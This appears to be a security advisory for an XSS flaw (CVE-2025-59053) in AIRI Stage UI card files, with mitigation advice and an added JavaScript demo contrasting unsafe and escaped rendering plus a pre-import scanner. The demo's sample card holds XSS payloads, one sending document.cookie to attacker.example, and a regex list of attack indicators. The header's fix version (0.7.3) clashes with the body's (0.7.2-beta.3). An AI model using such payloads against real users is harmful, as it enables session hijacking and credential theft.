Platform: javascript
Component: stage-ui
Fixed in: 0.7.3
CVE-2025-59053 describes a critical cross-site scripting (XSS) vulnerability in the AIRI Stage UI component. Card files are processed and rendered directly in the user's browser without sanitization, so an attacker who controls a card file can inject HTML and JavaScript that runs in the user's session, potentially leading to account takeover or data theft. The vulnerability affects versions 0.7.2-beta.2 and earlier, and a patch is available in version 0.7.2-beta.3.
An attacker exploits this by crafting a malicious card file whose content carries an HTML or JavaScript payload (a script tag, an event-handler attribute, a javascript: URL). When the user loads that card in the AIRI Stage UI, the payload executes in the user's browser context, enabling session hijacking, credential theft, redirection to phishing sites, and defacement of the user interface. The impact is severe because it amounts to arbitrary client-side code execution under the victim's identity, giving the attacker broad control over the affected session. The root cause is the familiar one behind most XSS: untrusted input rendered into the DOM as HTML rather than as text.
CVE-2025-59053 was publicly disclosed on 2025-09-11. No active exploitation campaigns have been reported at the time of writing. No public proof-of-concept exploit is available, but XSS of this kind is simple to weaponize, so one may appear. The CVE is not listed in the CISA KEV catalog.
Exploit status
EPSS: 0.04% (11th percentile)
CISA SSVC: not available
CVSS vector: not available
The primary mitigation for CVE-2025-59053 is to upgrade immediately to version 0.7.2-beta.3 or later, which contains the fix. If upgrading is not immediately feasible, sanitize card content before it reaches the UI: render card fields as text rather than HTML, and pass any HTML produced from the card's Markdown through a sanitizer with an allowlist of tags and attributes. Treat card files from untrusted sources as untrusted input and scan them for script tags, event-handler attributes and javascript: URLs before import. A Web Application Firewall (WAF) helps only where card files reach the application through an HTTP endpoint; it never sees a file opened locally in the UI, so do not rely on it as the control. Continue to scan your AIRI Stage UI deployment with automated vulnerability tools.
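The following is an added example, not code from the AIRI project or from this advisory. It shows the rendering mistake described above (card fields interpolated into markup that is later assigned to innerHTML) beside the escaped alternative, and a small triage scan for card files received from untrusted sources. The card structure, field names and sample payloads are constructed for illustration; the real AIRI card schema is not assumed.

```javascript
// Added example (not AIRI project code). Demonstrates unsafe vs. escaped
// rendering of untrusted card-file fields and a pre-import triage scan.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape the five characters that let text break out into HTML syntax.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// VULNERABLE: card fields go straight into markup that the UI would assign
// to element.innerHTML, so any HTML in the card becomes live DOM.
function renderCardUnsafe(card) {
  return `<div class="card"><h2>${card.name}</h2><p>${card.description}</p></div>`;
}

// HARDENED: every untrusted field is escaped, so tags and attributes inside
// the card render as literal text. Assigning via textContent per node, or
// using framework text interpolation instead of raw-HTML binding, is equivalent.
function renderCardSafe(card) {
  return `<div class="card"><h2>${escapeHtml(card.name)}</h2><p>${escapeHtml(card.description)}</p></div>`;
}

// Indicators of active content in a card file. This is triage for files from
// untrusted sources, not a sanitizer; it never replaces escaping or an
// allowlist sanitizer on the rendered output.
const SUSPICIOUS = [
  { id: 'script-tag',     re: /<\s*script\b/i },
  { id: 'event-handler',  re: /\bon[a-z]+\s*=/i },
  { id: 'javascript-uri', re: /(?:href|src|action)\s*=\s*["']?\s*javascript:/i },
  { id: 'embedded-frame', re: /<\s*(?:iframe|object|embed)\b/i },
  { id: 'svg-or-math',    re: /<\s*(?:svg|math)\b/i },
];

// Walk every string in the card (nested objects and arrays included) and
// report which indicator matched at which JSON path, e.g. "$.tags[1]".
function scanCard(value, path = '$', findings = []) {
  if (typeof value === 'string') {
    for (const { id, re } of SUSPICIOUS) {
      if (re.test(value)) findings.push({ path, id });
    }
  } else if (Array.isArray(value)) {
    value.forEach((item, i) => scanCard(item, `${path}[${i}]`, findings));
  } else if (value && typeof value === 'object') {
    for (const [key, item] of Object.entries(value)) scanCard(item, `${path}.${key}`, findings);
  }
  return findings;
}

// Constructed sample cards (hypothetical schema): one benign, one carrying
// three distinct XSS payload shapes across different fields.
const BENIGN_CARD = {
  name: 'Aria',
  description: 'A friendly assistant. Likes tea & <3 cats.',
  tags: ['calm'],
};
const MALICIOUS_CARD = {
  name: 'Aria<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
  description: 'Click <a href="javascript:alert(1)">here</a>',
  tags: ['calm', '<svg onload=alert(1)>'],
};

// Run with `node` to see the three results side by side.
console.log('unsafe :', renderCardUnsafe(MALICIOUS_CARD));
console.log('safe   :', renderCardSafe(MALICIOUS_CARD));
console.log('scan   :', scanCard(MALICIOUS_CARD));
```

The unsafe render emits the img tag and its onerror handler intact; the safe render turns every angle bracket and quote into an entity so the browser shows the payload as text. The scan reports four findings for the malicious card (the onerror handler in the name, the javascript: link in the description, and both the onload handler and the svg tag in the second tag) and none for the benign card, whose "&" and "<3" are harmless. Where a field legitimately contains Markdown that must render as HTML, escaping is not an option; run the generated HTML through an allowlist sanitizer such as DOMPurify instead, and still refuse cards the scan flags.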
Update AIRI to version 0.7.2-beta.3 or later. This release fixes the XSS vulnerability and closes the resulting code-execution path, removing the risk of an attacker running malicious code through a crafted card file.
CVE-2025-59053 is a critical XSS vulnerability in AIRI Stage UI versions 0.7.2-beta.2 and prior, allowing attackers to inject malicious code via card files.
You are affected if you run AIRI Stage UI version 0.7.2-beta.2 or earlier and load card files from untrusted sources.
Upgrade to version 0.7.2-beta.3 or later to resolve the vulnerability. Treat input sanitization and WAF rules as temporary mitigations only.
No active exploitation campaigns have been reported, but the flaw is simple enough that exploitation is likely.
Refer to the official AIRI project documentation and security advisories for the latest information.